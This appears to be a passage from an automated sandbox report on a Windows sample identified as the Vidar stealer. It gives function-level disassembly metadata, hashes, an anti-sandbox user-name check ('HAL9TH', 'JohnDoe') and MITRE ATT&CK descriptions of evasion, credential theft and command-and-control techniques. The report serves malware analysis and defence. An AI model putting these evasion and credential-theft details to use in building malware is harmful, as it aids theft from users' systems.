__CxxThrowException@8.LIBCMT ref: 033A36E5

Part of subcall function 0343E241: RaiseException.KERNEL32(033A3573,?,004D479C,004BD94C,033A3573,?,004CDB30,?,004D479C), ref: 0343E283

Part of subcall function 033A3460: std::exception::exception.LIBCMT ref: 033A3496
Part of subcall function 033A3460: __CxxThrowException@8.LIBCMT ref: 033A34AD

Strings

0@, xrefs: 033A36DE

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
String ID: 0@
API String ID: 1430062303-1855383697
Opcode ID: 730a38bcf1da872eaa57031a5b0404e521368d33c7bb6e3c0c3b37da02cd70a7
Instruction ID: 3d4d6f4c560b4d2fbbcfe108cc42659b9fd03c037c96f4b53109a1e09e752cfc
Opcode Fuzzy Hash: 730a38bcf1da872eaa57031a5b0404e521368d33c7bb6e3c0c3b37da02cd70a7
Instruction Fuzzy Hash: 294194B9E00605ABCB04CF6DC8D46ADF7F9EF49320F14462EE81697750E735A914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00403950, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004039B7
_memmove.LIBCMT ref: 00403A0E

Strings

string too long, xrefs: 004039B2

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 0d19b3ce4685c015d470666d071d155d9baa43992e4e8f6733eb46548e261d43
Instruction ID: 87ca21f4a61fcd0e95b30cc2f4e0f440eb07de66b5df234315ef75715b5b8fb6
Opcode Fuzzy Hash: 0d19b3ce4685c015d470666d071d155d9baa43992e4e8f6733eb46548e261d43
Instruction Fuzzy Hash: B331C7723146148BC624DE5DE88082BFBEDEFD6752310093FE0C1E7690D7B5AD448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403590, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004035A2

Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7BD
Part of subcall function 0049C7A8: __CxxThrowException@8.LIBCMT ref: 0049C7D2
Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7E3

_memmove.LIBCMT ref: 004035EA

Strings

string too long, xrefs: 0040359D

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: 3fc89ab75f7615348a976bfec0fa19f4f4ebc1f279d9f7d4a5408a2808a3561c
Instruction ID: 8af4aba958ce3299e4a9ab51a24e9f7e30c4b8084d64f09e26b6c8bcc81440e7
Opcode Fuzzy Hash: 3fc89ab75f7615348a976bfec0fa19f4f4ebc1f279d9f7d4a5408a2808a3561c
Instruction Fuzzy Hash: 76115E715047096FDB30AD68A940A3BBBDC9B51711F100E3FE097D26C1EB79E9448268

Uniqueness

Uniqueness Score: -1.00%

Function 00419130, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00419149

Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7BD
Part of subcall function 0049C7A8: __CxxThrowException@8.LIBCMT ref: 0049C7D2
Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7E3

std::_Xinvalid_argument.LIBCPMT ref: 00419160

Strings

string too long, xrefs: 00419144, 0041915B

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 8876af0c304277f59e86738f415de1b0aadde35688cf2abcf7ba494b0c1b90b6
Instruction ID: 5dc76eae098a6be40ed3eee6cf3b901e3aaa27ffa2c8c7ea76ee85426ed212d2
Opcode Fuzzy Hash: 8876af0c304277f59e86738f415de1b0aadde35688cf2abcf7ba494b0c1b90b6
Instruction Fuzzy Hash: AF110B323006125BE7219A5CD894B9BF7E9AFA5751F20066FF151C7390C7A49CC487A8

Uniqueness

Uniqueness Score: -1.00%

Function 00403120, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403133

Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C80A
Part of subcall function 0049C7F5: __CxxThrowException@8.LIBCMT ref: 0049C81F
Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C830

_memmove.LIBCMT ref: 00403173

Strings

invalid string position, xrefs: 0040312E

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: b7a35ea820dd47794a6aeeff675afd56c00bbf423b8eba66e1f7a74ce68a2679
Instruction ID: 39b28b369eaac2a5d6f2fe230b144a7e9613283ae0b767c1a229ccac100eb6f8
Opcode Fuzzy Hash: b7a35ea820dd47794a6aeeff675afd56c00bbf423b8eba66e1f7a74ce68a2679
Instruction Fuzzy Hash: AA1182713046119BC724CE6CDD8085BF7AAAFD9706320493FD081DB654EB74D94687A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404C90, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 004930A0: GetUserNameA.ADVAPI32 ref: 004930D6

ExitProcess.KERNEL32 ref: 00404D25

Strings

HAL9TH, xrefs: 00404CF9
JohnDoe, xrefs: 00404CBA

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitNameProcessUser
String ID: HAL9TH$JohnDoe
API String ID: 282088302-3469431008
Opcode ID: 6ac390d5602c7bd1b7e1a9f57422534142e555b4e7651d063634bea77b9ff344
Instruction ID: 1af7e0c2e61fb6017e0ff77aa32172be8c300997b9704e811a5707f0751906ed
Opcode Fuzzy Hash: 6ac390d5602c7bd1b7e1a9f57422534142e555b4e7651d063634bea77b9ff344
Instruction Fuzzy Hash: 9511E3B69063009BDE00EB61DD42A4BB7D8AF88745F05483FF98997290E73CE604C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004030A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004030B3

Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C80A
Part of subcall function 0049C7F5: __CxxThrowException@8.LIBCMT ref: 0049C81F
Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C830

_memmove.LIBCMT ref: 004030EE

Strings

invalid string position, xrefs: 004030AE

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 9b1fd163ef797a41f3b61191c5cfff13542d3869ad7c90d5e52fbd284588610d
Instruction ID: dad20c7d63c881c271b9b7de90ce9035f5ca221bac5136e6fbc1ca66feaae534
Opcode Fuzzy Hash: 9b1fd163ef797a41f3b61191c5cfff13542d3869ad7c90d5e52fbd284588610d
Instruction Fuzzy Hash: A201C4313042014BC3248D2CDD8051AFBEAABD5701B244D3ED081D7789D6B5ED4687A8

Uniqueness

Uniqueness Score: -1.00%

Function 004A3597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0049E36F: __getptd.LIBCMT ref: 0049E375
Part of subcall function 0049E36F: __getptd.LIBCMT ref: 0049E385

__getptd.LIBCMT ref: 004A35A6

Part of subcall function 004A64DD: __getptd_noexit.LIBCMT ref: 004A64E0
Part of subcall function 004A64DD: __amsg_exit.LIBCMT ref: 004A64ED

__getptd.LIBCMT ref: 004A35B4

Strings

csm, xrefs: 004A35C2

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 13f6baa98dff881eb24ebd0b68a76a97ff0b9319efa4a1b86dd0e3b61b20ac21
Instruction ID: d7ef1920e8d6d58cae6403b1350204889eb5cc83e9f354c43873c6549f0ed47a
Opcode Fuzzy Hash: 13f6baa98dff881eb24ebd0b68a76a97ff0b9319efa4a1b86dd0e3b61b20ac21
Instruction Fuzzy Hash: E1014F74800305AADF349F66D44166EBBB5AF26316F64842FF4415B351EB39CA80CF09

Uniqueness

Uniqueness Score: -1.00%

Function 034437E7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 034437F6

Part of subcall function 0344672D: __getptd_noexit.LIBCMT ref: 03446730
Part of subcall function 0344672D: __amsg_exit.LIBCMT ref: 0344673D

__getptd.LIBCMT ref: 03443804

Strings

csm, xrefs: 03443812

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 13f6baa98dff881eb24ebd0b68a76a97ff0b9319efa4a1b86dd0e3b61b20ac21
Instruction ID: 3eb5dc44641475d5d7a3d8abf37a939dcbf6d93bb239f073b6ac3ac6b7aa0fe5
Opcode Fuzzy Hash: 13f6baa98dff881eb24ebd0b68a76a97ff0b9319efa4a1b86dd0e3b61b20ac21
Instruction Fuzzy Hash: 3A01523D8013058EEF24EE62D4406AEFBF8AF14610F28447FD4809E790CB30C6A4CE08

Uniqueness

Uniqueness Score: -1.00%

Function 00418850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00418890
__CxxThrowException@8.LIBCMT ref: 004188A7

Part of subcall function 0049DF71: _malloc.LIBCMT ref: 0049DF8B

Strings

0@, xrefs: 0041889F

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0@
API String ID: 4063778783-1855383697
Opcode ID: 31fb21ec407f3bd9e3f97d4d63d7ea0d4e11f1156bf9d01c2bad1a449cfe289b
Instruction ID: 643558e96f964b25ca32a1048603abd081d5b2979493dbb7873a2c4a4a1b7667
Opcode Fuzzy Hash: 31fb21ec407f3bd9e3f97d4d63d7ea0d4e11f1156bf9d01c2bad1a449cfe289b
Instruction Fuzzy Hash: B4F0A0B99043015BE708EF65DD52BAB76E4AF90B04F44883EA80982240FB3CD94CC65B

Uniqueness

Uniqueness Score: -1.00%

Function 033B8AA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 033B8AE0
__CxxThrowException@8.LIBCMT ref: 033B8AF7

Part of subcall function 0343E1C1: _malloc.LIBCMT ref: 0343E1DB

Strings

0@, xrefs: 033B8AEF

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0@
API String ID: 4063778783-1855383697
Opcode ID: 31fb21ec407f3bd9e3f97d4d63d7ea0d4e11f1156bf9d01c2bad1a449cfe289b
Instruction ID: 7703c2e60afbb0e2a776c11840afad813548256c689127ae895b10999a613119
Opcode Fuzzy Hash: 31fb21ec407f3bd9e3f97d4d63d7ea0d4e11f1156bf9d01c2bad1a449cfe289b
Instruction Fuzzy Hash: 9CF0A7BA6043019BD308DB66DD91BAFB7E89F94600F08442D9505CA500F774D50C8657

Uniqueness

Uniqueness Score: -1.00%

Function 00403210, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00403246
__CxxThrowException@8.LIBCMT ref: 0040325D

Part of subcall function 0049DF71: _malloc.LIBCMT ref: 0049DF8B

Strings

0@, xrefs: 00403255

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0@
API String ID: 4063778783-1855383697
Opcode ID: e678b654b9d9a1315f1ad3a7642cc4c20e21ed8827e04297a5447e2cf1a309e6
Instruction ID: c2e58f528727555434fe7f2cc759e2ee4693d5561ddbfdb4d7df8bdbb7c6c555
Opcode Fuzzy Hash: e678b654b9d9a1315f1ad3a7642cc4c20e21ed8827e04297a5447e2cf1a309e6
Instruction Fuzzy Hash: 56E0E5B580430196C714EE64C556A5B7BE8AF90704F14493EF41641184FB38DA0C851B

Uniqueness

Uniqueness Score: -1.00%

Function 00404460, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040447B

Part of subcall function 0049C967: std::ios_base::_Tidy.LIBCPMT ref: 0049C988

Strings

`D@, xrefs: 0040446C
@~A, xrefs: 00404475

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: @~A$`D@
API String ID: 3167631304-143822743
Opcode ID: ba0dc4508a973af586431f9048ee740e09e98343dbefa564956feb4d5ad1a893
Instruction ID: aa91180221eb5d6e8dce4d495ac87c52ca02788792a7867f439abc29170577b5
Opcode Fuzzy Hash: ba0dc4508a973af586431f9048ee740e09e98343dbefa564956feb4d5ad1a893
Instruction Fuzzy Hash: 4EE026F19002115BC700CF08D840796BB94AF4530CB14847ED84953341E37AEA45C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00404420, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040443B

Part of subcall function 0049C967: std::ios_base::_Tidy.LIBCPMT ref: 0049C988

Strings

D@, xrefs: 0040442C
@~A, xrefs: 00404435

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: D@$@~A
API String ID: 3167631304-1900439046
Opcode ID: 8fa530e36f8e0ceceac8b171a68651452a01fe06c86250f81cc02b269ff965fc
Instruction ID: c5ef1df9b52ad0d21522531f3bce5fb2cffe52cb6aebf28b748eefc311ba9d47
Opcode Fuzzy Hash: 8fa530e36f8e0ceceac8b171a68651452a01fe06c86250f81cc02b269ff965fc
Instruction Fuzzy Hash: 02E086F19002514BC700DB14D844687BB949F5530CF15C06EDD8957352E37AAD95C7E5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report MSQNZmmg2F.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Vidar

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre